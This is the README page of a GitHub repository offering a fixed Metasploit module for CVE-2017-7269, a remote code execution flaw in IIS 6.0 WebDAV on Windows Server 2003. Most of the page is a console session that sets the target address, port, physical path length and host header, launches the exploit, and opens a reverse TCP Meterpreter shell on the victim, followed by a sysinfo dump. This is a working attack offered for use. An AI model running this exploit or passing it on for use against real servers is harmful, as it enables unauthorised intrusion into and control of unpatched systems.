Skip to content

zcgonvh/cve-2017-7269

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 

Repository files navigation

fixed msf module for cve-2017-7269

fix not work when length of physical path not equal to 19,or has a host binding.

add options: PhysicalPathLength,HttpHost

for test: host phyiscal path: c:\inetpub\ , length=11

msf > use exploit/windows/iis/cve-2017-7269
msf exploit(cve-2017-7269) > show options

Module options (exploit/windows/iis/cve-2017-7269):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HttpHost            localhost        yes       http host for target
   PhysicalPathLength  19               yes       length of physical path for target(include backslash)
   RHOST                                yes       The target address
   RPORT               80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2


msf exploit(cve-2017-7269) > set rhost 192.168.223.130
rhost => 192.168.223.130
msf exploit(cve-2017-7269) > set rport 8088
rport => 8088
msf exploit(cve-2017-7269) > set physicalpathlength 11
physicalpathlength => 11
msf exploit(cve-2017-7269) > set httphost zcgonvh-test.com
httphost => zcgonvh-test.com
msf exploit(cve-2017-7269) > exploit

[*] Started reverse TCP handler on 192.168.223.129:4444 
[*] Sending stage (957487 bytes) to 192.168.223.130
[*] Meterpreter session 1 opened (192.168.223.129:4444 -> 192.168.223.130:1135) at 2017-03-30 18:13:41 -0400

meterpreter > sysinfo
Computer        : ZCG-AA4B4E60208
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > 

About

fixed msf module for cve-2017-7269

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages